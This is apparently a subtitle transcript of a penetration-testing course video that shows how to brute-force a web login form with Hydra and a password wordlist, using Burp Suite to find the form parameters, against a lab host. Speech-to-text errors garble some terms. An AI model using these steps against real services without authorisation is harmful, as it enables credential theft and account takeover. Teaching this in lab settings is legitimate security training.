1
00:00:01,860 --> 00:00:07,530
Now that we have a wordlist ready whether you downloaded it from the internet or if you created it by

2
00:00:07,530 --> 00:00:08,470
yourself.

3
00:00:08,580 --> 00:00:16,770
Now we can go ahead and proceed to gain access to our target web site using a wordlist attack.

4
00:00:16,820 --> 00:00:23,060
So we're going to use a tool called Tida and hydro can be used to brute force any type of service really

5
00:00:23,060 --> 00:00:26,500
I can think of any service that you can brute force.

6
00:00:26,510 --> 00:00:29,750
So it's a really handy tool to know how to use.

7
00:00:29,870 --> 00:00:38,120
We're going to do our example on a Web log in but you can use it to gain access to S-sh FGP routers

8
00:00:38,360 --> 00:00:44,090
anything that asks you for a username and password really so to use the tool.

9
00:00:44,110 --> 00:00:49,620
The first thing we're going to do is we're going to type in Hydra and we're up with minus help to see

10
00:00:49,620 --> 00:00:50,610
how to use it.

11
00:00:53,080 --> 00:00:58,220
Now as you can see there's a lot of options for the tool but don't be overwhelmed with that.

12
00:00:58,270 --> 00:01:00,820
They're all very pretty simple to use.

13
00:01:01,270 --> 00:01:08,030
So if you go up you can see that the main syntax of using the tool is you have the first thing you have

14
00:01:08,030 --> 00:01:10,280
to do is put in the name of the tool.

15
00:01:10,280 --> 00:01:18,640
So we're going to put Hydra and then we're going to put the service that we want to attack so you can

16
00:01:18,640 --> 00:01:26,080
see that they have examples here of you attacking an FPP service people attacking an eye map service

17
00:01:26,500 --> 00:01:28,670
and other type of services.

18
00:01:28,690 --> 00:01:40,300
So in our example we are interested into gaining access to our log in here to this page and we're going

19
00:01:40,300 --> 00:01:45,550
to assume that we don't know a username and password and we're going to try to log in to the admin without

20
00:01:45,550 --> 00:01:46,680
knowing their password.

21
00:01:49,000 --> 00:01:55,850
So our target service is going to be this one.

22
00:01:55,870 --> 00:02:01,540
So the first thing you want to use is its IP so the IP is 10 20 11:46.

23
00:02:01,810 --> 00:02:03,910
So we're going to put it after the name of the tool

24
00:02:06,980 --> 00:02:11,560
then lookin out the syntax here.

25
00:02:11,760 --> 00:02:17,030
You can see that we have to specify a log in and password.

26
00:02:17,160 --> 00:02:21,360
So let's have a look on the minus L and D minus P options in here.

27
00:02:22,180 --> 00:02:26,930
And you can see that you can use a small l to specify one username.

28
00:02:26,980 --> 00:02:30,810
Or I can tell L to specify a list of user names.

29
00:02:30,850 --> 00:02:34,700
So in our example we're only trying to gain access to the admin.

30
00:02:34,810 --> 00:02:40,670
So we're not going to use a list of user names are only going to try to gain access to the admin password.

31
00:02:41,020 --> 00:02:46,810
So we're going to do is we're going to do minus L small and then we're going to tell it that the user

32
00:02:46,810 --> 00:02:54,480
name is admen and then the next thing we need to specify is the password or a password list.

33
00:02:55,520 --> 00:03:03,140
So similar to the option you can use a small p to give one password or you can use a capital P to specify

34
00:03:03,590 --> 00:03:07,390
a file or a wordlist or a dictionary of passwords.

35
00:03:08,530 --> 00:03:14,310
So I'm actually going to modify the passwords file that we created in the previous video.

36
00:03:14,360 --> 00:03:18,360
I'm just going to open it and my text editor.

37
00:03:18,520 --> 00:03:21,400
So this one right here is called testor ATX D.

38
00:03:21,940 --> 00:03:24,370
And I'm just going to add the password for the admin.

39
00:03:24,370 --> 00:03:29,020
I know the password for the admin is called admin pass and I'll just add it somewhere in the middle

40
00:03:29,020 --> 00:03:29,460
here.

41
00:03:31,950 --> 00:03:33,820
OK so I'm going to save it and quit it.

42
00:03:34,980 --> 00:03:38,490
And now our word our word list contains the password.

43
00:03:38,690 --> 00:03:39,650
So we're going to do.

44
00:03:39,660 --> 00:03:42,000
Might not be tapped.

45
00:03:42,350 --> 00:03:48,130
And then we're going to give it where the password is stored and it's stored and rude test takes the

46
00:03:50,670 --> 00:03:56,160
so everything is good until now and there is only one more thing to do.

47
00:03:56,160 --> 00:04:00,540
We still haven't specified what type of service that we're attacking.

48
00:04:00,540 --> 00:04:07,560
So we gave it the IP we gave it the username and we gave it the list of passwords to try.

49
00:04:08,010 --> 00:04:12,020
But hydras still doesn't know what type of service that we're going to attack.

50
00:04:12,360 --> 00:04:18,390
And that is the most important option and the option that you need to pay the most attention to because

51
00:04:18,780 --> 00:04:20,520
this is where it gets a bit tricky.

52
00:04:20,580 --> 00:04:23,350
And this is where things can go wrong.

53
00:04:23,370 --> 00:04:28,860
So before I start talking about that I'm actually going to copy our command so far and I'm just going

54
00:04:28,860 --> 00:04:30,850
to paste it in a notepad.

55
00:04:37,120 --> 00:04:43,210
So all we have to do now is tell Hydra what type of service and how to use the service to brute force

56
00:04:43,210 --> 00:04:45,640
the username and password for me.

57
00:04:45,640 --> 00:04:47,500
And you can see here in the help.

58
00:04:47,650 --> 00:04:51,780
It's telling us that these are all the type of the supported services.

59
00:04:51,790 --> 00:04:55,490
So as I said I can't actually think of a service that's not supported.

60
00:04:55,870 --> 00:04:58,930
So you can have a look on all of these and try them.

61
00:04:59,170 --> 00:05:02,070
What we're interested into is the Hastey t.p.

62
00:05:02,350 --> 00:05:08,620
And you can see that there's going to be a minus and it's going to be either get or post depending on

63
00:05:08,620 --> 00:05:09,830
our target.

64
00:05:10,510 --> 00:05:15,840
And after that it's also going to be a forum because it's sent through the mail.

65
00:05:16,150 --> 00:05:18,040
And I'll tell you why it's going to be like this.

66
00:05:18,040 --> 00:05:18,880
Now let's go down

67
00:05:22,120 --> 00:05:30,000
so I'm going the right click in here and I'm going to go to inspect element and I'm going to click.

68
00:05:30,010 --> 00:05:33,880
I'm going to look for something called forum and you can see that there is a form there has to be a

69
00:05:33,880 --> 00:05:38,580
form in the Hastey email pages and look for the method.

70
00:05:38,730 --> 00:05:40,250
I'm going to zoom in for you.

71
00:05:43,180 --> 00:05:47,240
And note that in here it says that the method is going to be Post.

72
00:05:47,680 --> 00:05:50,370
And that way we know that it's a post.

73
00:05:50,770 --> 00:05:57,760
And if you look at the R L here you'll see that the R L is a hash TTP it's not a hasty TTP as.

74
00:05:57,880 --> 00:06:05,760
So therefore our module that we're going to use here or the service is going to be hasty post 4.

75
00:06:06,220 --> 00:06:10,460
So it's right here you can see all the type of services like I said.

76
00:06:10,540 --> 00:06:18,790
So it's hasty T.P. followed by a minus followed by post and followed by four.

77
00:06:19,290 --> 00:06:24,190
And to see how we can use this and to see an example of how you can use the service I'm actually going

78
00:06:24,190 --> 00:06:32,240
to Control-C this and I'm going to say Hydra why not you and I'm going to give it the name of the farm

79
00:06:32,260 --> 00:06:36,170
or the name of the service that I want to use which is going to be hasty.

80
00:06:42,520 --> 00:06:43,350
As you can see now.

81
00:06:43,360 --> 00:06:49,450
Again it's giving you a long description about how you can use the service and at the bottom it gives

82
00:06:49,450 --> 00:06:52,140
you examples and the examples are amazing.

83
00:06:52,420 --> 00:07:00,050
The examples are really good because you can't just copy and paste them and adapt them to your target.

84
00:07:00,190 --> 00:07:07,210
So the format of this service is you give it the location where the brute force where you want to brute

85
00:07:07,210 --> 00:07:09,580
force the form from.

86
00:07:09,840 --> 00:07:15,150
You're going to give it the user parameters so whether it's a you will whatever this parameter is called

87
00:07:16,000 --> 00:07:21,850
and then you're going to give it the password parameter and then you're going to give it the incorrect

88
00:07:21,850 --> 00:07:26,640
message so when there's a failed log in what happens to the web page.

89
00:07:26,690 --> 00:07:28,550
So I'm going to copy this the way it is

90
00:07:34,030 --> 00:07:37,440
and get modified to adapt to our target.

91
00:07:37,470 --> 00:07:45,030
So the first thing we want to put is the page that the log in happens from which is this page.

92
00:07:45,070 --> 00:07:52,820
So we're going to put all of this instead of log in that ph here.

93
00:07:52,900 --> 00:07:54,700
So that's all good.

94
00:07:55,150 --> 00:08:00,420
Now the next thing that we need to modify is the user on the pass.

95
00:08:00,430 --> 00:08:06,550
So these are the names of the parameters that are sent to the web application and we don't know what

96
00:08:06,550 --> 00:08:07,870
these are called.

97
00:08:07,960 --> 00:08:10,140
And for this we're going to use Burts suits.

98
00:08:10,240 --> 00:08:14,130
Now I'm not going to show you how to configure this because we've done that before.

99
00:08:14,350 --> 00:08:20,010
So I'm just going to turn my interceptor on and I'm going to log in with wrong username and password.

100
00:08:20,010 --> 00:08:24,020
So I just want to see what gets sent to the target web application.

101
00:08:24,070 --> 00:08:29,140
So I'm just going to log in with the username admin and just any password so I'm just going to put random

102
00:08:29,140 --> 00:08:35,000
characters hit enter and I'm going to go on the headers.

103
00:08:36,530 --> 00:08:38,200
And this is what's being sent.

104
00:08:38,200 --> 00:08:43,580
So you can see that the username parameter is just called username.

105
00:08:43,730 --> 00:08:49,370
So I'm going to copy that and put it here instead of user.

106
00:08:49,580 --> 00:08:53,790
And we can also see the passwords parameter.

107
00:08:53,890 --> 00:09:01,120
Again it's called password instead of POS and you can see that we also have an or parameter here which

108
00:09:01,120 --> 00:09:01,630
is.

109
00:09:01,660 --> 00:09:04,470
And log in Submit button equals log in.

110
00:09:04,660 --> 00:09:06,790
So you need to add that as well.

111
00:09:06,790 --> 00:09:12,700
And in your case if you had other things that's been sent you need to add them as well to your request.

112
00:09:13,030 --> 00:09:19,980
So we're going to add that after the past here exactly the way it is we're not going to modify anything.

113
00:09:20,130 --> 00:09:26,540
So it's just going to be and Logan ph resubmit submit button equals log in.

114
00:09:26,600 --> 00:09:34,040
The last thing that we need to modify Is this part and this part is the way that Hydra is going to know

115
00:09:34,040 --> 00:09:38,070
whether the loggin is successful or unsuccessful.

116
00:09:38,120 --> 00:09:46,580
So the way this is going to work is you either give it a capital F equals to the unsuccessful so it

117
00:09:46,580 --> 00:09:53,750
equals to the failed attempt or you can give it a capital S and you tell it what happens when a successful

118
00:09:53,750 --> 00:09:55,580
luggin happens.

119
00:09:55,580 --> 00:10:03,170
So in my case I'm going to give it capital F to tell it what happens when I feel like it happens and

120
00:10:03,170 --> 00:10:07,870
I'm just going to turn off the interceptor now and we can see that we have failed again.

121
00:10:08,540 --> 00:10:15,320
And NFL again you can either use this or in my experimentation it was easier to just use this so if

122
00:10:15,320 --> 00:10:20,050
you just use the message right here that says not log then.

123
00:10:20,180 --> 00:10:22,370
So we're going to say F equals

124
00:10:30,030 --> 00:10:36,730
So this is the most part the most important part and the most tricky part I'd say of the whole attack.

125
00:10:36,920 --> 00:10:38,400
So I'm going to go over it again.

126
00:10:39,260 --> 00:10:42,660
We can see that the whole quest is separated by three columns.

127
00:10:44,030 --> 00:10:51,240
The start of it is the location where we want where the page that we're going to brute force is.

128
00:10:51,290 --> 00:10:53,240
So we took that from here.

129
00:10:56,080 --> 00:11:02,870
The second part is the parameters that we're going to be dealing with and that we're going to be sent

130
00:11:02,870 --> 00:11:08,220
into the server and we took that from birth suit.

131
00:11:08,460 --> 00:11:16,230
And the third part is the way that prep suit is going to know whether the slogan is successful or unsuccessful.

132
00:11:16,500 --> 00:11:22,380
And we gave it kept alive to tell it that this is what happens when the password is wrong.

133
00:11:22,740 --> 00:11:27,770
And we told it that you'll see a message called not logged in.

134
00:11:27,810 --> 00:11:32,790
So we're going to combine this with the command that we already had so Commander we already had was

135
00:11:32,790 --> 00:11:42,120
Hydra the IP followed by the user name that we're going to use which is admin followed by the password

136
00:11:42,440 --> 00:11:47,780
list and we're going to put all of this after it and that's it.

137
00:11:47,790 --> 00:11:49,310
That's our command done.

138
00:11:49,350 --> 00:11:50,310
I'm going to copy this

139
00:11:53,480 --> 00:12:02,590
paste it in here and execute and I forgot to tell it the type of service that we're going to be attacking.

140
00:12:02,790 --> 00:12:08,250
So I only gave it the I only gave it what it should send but I didn't tell it what type of service we're

141
00:12:08,250 --> 00:12:09,390
going to attack.

142
00:12:09,390 --> 00:12:14,600
So like I said before it's going to be hasty TTP Post forum.

143
00:12:14,640 --> 00:12:20,170
So it's the same service that we were inquiring about when we use the option.

144
00:12:20,190 --> 00:12:21,690
So again copy this

145
00:12:24,600 --> 00:12:25,830
pasted here.

146
00:12:26,280 --> 00:12:28,160
Hit enter.

147
00:12:28,360 --> 00:12:34,690
Now you can use the minus We option so that Hydra would actually display every request it sends to the

148
00:12:34,690 --> 00:12:35,400
server.

149
00:12:35,650 --> 00:12:39,410
I didn't use that right now so all this is literally just a blank screen.

150
00:12:39,550 --> 00:12:43,130
But we're going to wait for it until it finds the password for us.

151
00:12:43,150 --> 00:12:45,940
Hydra also supports pause and resume.

152
00:12:45,940 --> 00:12:51,550
So if you just Control-C out of this the next time you're on it all you have to do is just put in minus

153
00:12:51,610 --> 00:12:56,830
or and that'll actually allow you to continue from where were you left.

154
00:12:56,830 --> 00:12:57,490
The last time

155
00:13:00,250 --> 00:13:06,430
and as you can see now we managed to find a valid username and password and you can see that the user

156
00:13:06,430 --> 00:13:09,460
name is admin and the password is admin pass.

157
00:13:09,910 --> 00:13:12,250
And this works against any weblog.

158
00:13:12,260 --> 00:13:18,670
And so literally this weblog it doesn't read doesn't need to have any skill injections or javascript

159
00:13:18,670 --> 00:13:20,340
or access or anything.

160
00:13:20,350 --> 00:13:28,820
So now I can log in with the username admin and password admin pass and as you can see now I'm logged

161
00:13:28,820 --> 00:13:29,980
in as admin.